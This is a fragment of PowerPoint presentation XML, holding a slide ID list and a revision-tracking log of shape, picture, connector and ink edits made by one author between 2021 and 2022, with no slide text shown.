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4"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="512" r:id="rId3"/>
    <p:sldId id="373" r:id="rId4"/>
    <p:sldId id="444" r:id="rId5"/>
    <p:sldId id="446" r:id="rId6"/>
    <p:sldId id="490" r:id="rId7"/>
    <p:sldId id="491" r:id="rId8"/>
    <p:sldId id="492" r:id="rId9"/>
    <p:sldId id="445" r:id="rId10"/>
    <p:sldId id="493" r:id="rId11"/>
    <p:sldId id="494" r:id="rId12"/>
    <p:sldId id="495" r:id="rId13"/>
    <p:sldId id="496" r:id="rId14"/>
    <p:sldId id="497" r:id="rId15"/>
    <p:sldId id="453" r:id="rId16"/>
    <p:sldId id="454" r:id="rId17"/>
    <p:sldId id="498" r:id="rId18"/>
    <p:sldId id="510" r:id="rId19"/>
    <p:sldId id="499" r:id="rId20"/>
    <p:sldId id="500" r:id="rId21"/>
    <p:sldId id="501" r:id="rId22"/>
    <p:sldId id="502" r:id="rId23"/>
    <p:sldId id="503" r:id="rId24"/>
    <p:sldId id="504" r:id="rId25"/>
    <p:sldId id="505" r:id="rId26"/>
    <p:sldId id="506" r:id="rId27"/>
    <p:sldId id="507" r:id="rId28"/>
    <p:sldId id="467" r:id="rId29"/>
    <p:sldId id="508" r:id="rId30"/>
    <p:sldId id="509" r:id="rId31"/>
    <p:sldId id="511" r:id="rId32"/>
    <p:sldId id="42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40" dt="2022-09-26T21:56:23.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7" autoAdjust="0"/>
    <p:restoredTop sz="86667" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="55" d="100"/>
          <a:sy n="55" d="100"/>
        </p:scale>
        <p:origin x="42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docChgLst>
    <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}"/>
    <pc:docChg chg="undo custSel addSld modSld">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:39:26.528" v="1230" actId="9405"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T20:57:37.526" v="1207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1325061211" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T20:57:37.526" v="1207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="7" creationId="{F2871076-CFC8-4CD5-BF65-ECB4ACAEF8D8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:32:11.250" v="1055" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2616338024" sldId="373"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:32:11.250" v="1055" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2616338024" sldId="373"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T12:17:46.771" v="1151" actId="1076"/>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2-09-05T12:33:43.760" v="1063"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2-02-28T17:44:58.462" v="1019" actId="6549"/>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add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T12:17:46.771" v="1151" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="969276203" sldId="444"/>
            <ac:picMk id="3" creationId="{AD4FB5A9-3D63-1490-9F12-FA8A4270B582}"/>
          </ac:picMkLst>
        </pc:pic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modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T12:20:05.719" v="1202" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2518429501" sldId="445"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T12:20:05.719" v="1202" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2518429501" sldId="445"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:36:04.349" v="1110" actId="13822"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2089025007" sldId="446"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:29:44.117" v="1045" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2089025007" sldId="446"/>
            <ac:spMk id="7" creationId="{55968F36-E404-48E8-80CA-52C67852A6DD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:30:00.431" v="1047" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2089025007" sldId="446"/>
            <ac:spMk id="16" creationId="{A7166D24-8FC4-F263-22CA-7A0BD1ACF199}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:35:36.589" v="1108" actId="403"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2089025007" sldId="446"/>
            <ac:spMk id="17" creationId="{EE8C9AD7-C4A6-D958-F5F0-30F414F05EC2}"/>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2-09-05T12:28:29.383" v="1039" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2089025007" sldId="446"/>
            <ac:picMk id="3" creationId="{9BCCEF90-E352-1AA6-AF03-BD9A49205B53}"/>
          </ac:picMkLst>
        </pc:pic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2-09-05T12:28:38.516" v="1042" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2089025007" sldId="446"/>
            <ac:cxnSpMk id="6" creationId="{6EE24E55-EC09-A96F-1CAC-D881D36537A9}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:29:42.965" v="1044" actId="478"/>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del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:28:53.591" v="1043" actId="478"/>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cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:36:04.349" v="1110" actId="13822"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2089025007" sldId="446"/>
            <ac:cxnSpMk id="20" creationId="{A9ECA26E-7BFF-984F-990C-A347AA865302}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:24:30.795" v="1226" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2427580819" sldId="453"/>
        </pc:sldMkLst>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:24:30.795" v="1226" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2427580819" sldId="453"/>
            <ac:inkMk id="2" creationId="{63BF08B5-58DD-CB09-FD46-A825C6314B9A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:23:37.764" v="1225" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="156228340" sldId="454"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-02-23T13:43:51.230" v="1012" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="156228340" sldId="454"/>
            <ac:spMk id="2" creationId="{2E051C2F-9025-48D3-8554-B0E0E3B004AA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:23:37.764" v="1225" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="156228340" sldId="454"/>
            <ac:inkMk id="4" creationId="{EDFF498D-D4F3-23C4-B8E5-384CCA35164D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:50:54.873" v="260" actId="12"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="965843776" sldId="467"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:50:54.873" v="260" actId="12"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="965843776" sldId="467"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:28.353" v="1220" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3015196105" sldId="491"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:55:55.940" v="1208" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:09.892" v="1213"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:grpSpMk id="9" creationId="{5FD950B2-DD7A-980E-5E00-B869EBABC833}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:21.722" v="1216"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:grpSpMk id="14" creationId="{CD82EAA9-56DE-7307-51C7-D66684EC869E}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:23.587" v="1218"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:grpSpMk id="17" creationId="{53717940-0304-7AE9-651D-B8787D49385E}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:23.587" v="1218"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:grpSpMk id="19" creationId="{BA2092D9-41BB-35DA-110D-05E0D7227419}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T12:17:18.099" v="1147" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:picMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>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inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:23.587" v="1218"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:inkMk id="7" creationId="{960A42CD-C9C2-4F3C-EA82-08FC10F02016}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:23.587" v="1218"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:inkMk id="8" creationId="{26BCBAFC-B799-8E38-6A3E-E2C84191B8C7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:23.587" v="1218"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:inkMk id="13" creationId="{D462BE2A-6A73-B7B3-A568-77DA09958A48}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:14.430" v="1214" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:inkMk id="15" creationId="{0682F64C-86ED-FDF8-AC44-630D4AC5A445}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:23.587" v="1218"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:inkMk id="16" creationId="{D408BFF6-7043-3711-DEA9-6EC294C297C5}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:23.587" v="1218"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:inkMk id="18" creationId="{1BC7AFB8-97AF-83CE-D450-18CEBF7C5B06}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:26.840" v="1219" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:inkMk id="20" creationId="{C8355774-87A5-919B-E69E-1F51DDFC4A58}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:28.353" v="1220" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:inkMk id="21" creationId="{C4E34C17-51EA-F1E7-199C-A0E5A43F3001}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:02:34.507" v="1221" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1674251011" sldId="492"/>
        </pc:sldMkLst>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inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:02:34.507" v="1221" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1674251011" sldId="492"/>
            <ac:inkMk id="4" creationId="{1432862E-03CB-4412-166B-0D44F528ACDF}"/>
          </ac:inkMkLst>
        </pc:ink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addSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:15:26.201" v="1222" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2416641626" sldId="493"/>
        </pc:sldMkLst>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:15:26.201" v="1222" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2416641626" sldId="493"/>
            <ac:inkMk id="2" creationId="{DBE5B3CB-0C46-5BFC-C965-C3B23702C669}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:22:16.953" v="1224" actId="9405"/>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inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:22:05.147" v="1223" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="311612657" sldId="494"/>
            <ac:inkMk id="2" creationId="{FBD06D31-7CAC-5B43-D03B-877056D08B72}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:22:16.953" v="1224" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="311612657" sldId="494"/>
            <ac:inkMk id="6" creationId="{CCE866D0-3FE2-6B52-B626-F1397DA2AD3D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:26:49.884" v="1227" actId="9405"/>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inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:26:49.884" v="1227" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1035595462" sldId="498"/>
            <ac:inkMk id="2" creationId="{96C1D5EF-A478-2D77-CFC4-CB7513BD80CE}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:29:12.469" v="1228" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1984385075" sldId="499"/>
        </pc:sldMkLst>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:29:12.469" v="1228" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1984385075" sldId="499"/>
            <ac:inkMk id="2" creationId="{95B91847-4ACB-D04A-3B3A-37F13EEDEA78}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:35:37.927" v="1229" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3318379012" sldId="500"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-02-23T13:47:17.092" v="1014" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3318379012" sldId="500"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-02-23T13:47:32.650" v="1015" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3318379012" sldId="500"/>
            <ac:spMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:35:37.927" v="1229" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3318379012" sldId="500"/>
            <ac:inkMk id="3" creationId="{43E7A8F8-8CEA-7F30-B0EF-A79C5B5E1DAC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:39:26.528" v="1230" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="198983510" sldId="502"/>
        </pc:sldMkLst>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:39:26.528" v="1230" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="198983510" sldId="502"/>
            <ac:inkMk id="2" creationId="{DB85E6CB-A996-659F-CCDB-CEA43CE67FF1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T12:28:57.634" v="1205" actId="13822"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="198983510" sldId="502"/>
            <ac:cxnSpMk id="3" creationId="{743F91A7-6CB8-DB6A-2DDD-A6B0E1D0F328}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T12:29:09.438" v="1206" actId="11529"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="198983510" sldId="502"/>
            <ac:cxnSpMk id="7" creationId="{5810B019-E431-AF3A-5D0A-AB6946B1AA80}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:47:15.824" v="1129" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1270554279" sldId="505"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
